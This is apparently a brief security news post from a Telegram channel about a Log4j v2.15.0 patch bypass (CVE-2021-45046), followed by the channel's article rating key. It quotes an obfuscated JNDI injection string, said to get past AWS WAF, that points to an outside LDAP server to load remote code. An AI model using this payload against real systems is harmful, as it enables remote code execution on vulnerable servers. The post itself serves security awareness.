December 23, 2021 at 04:03PM

■■■□□ Log4J v2.15.0 Patch Bypass

RCE Log4j-scan can now discover the new patch bypass on v2.15.0 (CVE-2021-45046).

Just bypassed AWS WAF for log4j jndi injection: ${j $ {k 8s :k5:-ND }i${sd: k5:-:}ldap://mydogsbutt.c om: 13 89/o}

https://t.me/cKure/10459

Rating (of articles):
●○○○○ = Ignorable
●●○○○ = Average
●●●○○ = Good
●●●●○ = Very Good
●●●●● = Excellent
None  = Top-Class

 i@ckure.esy.es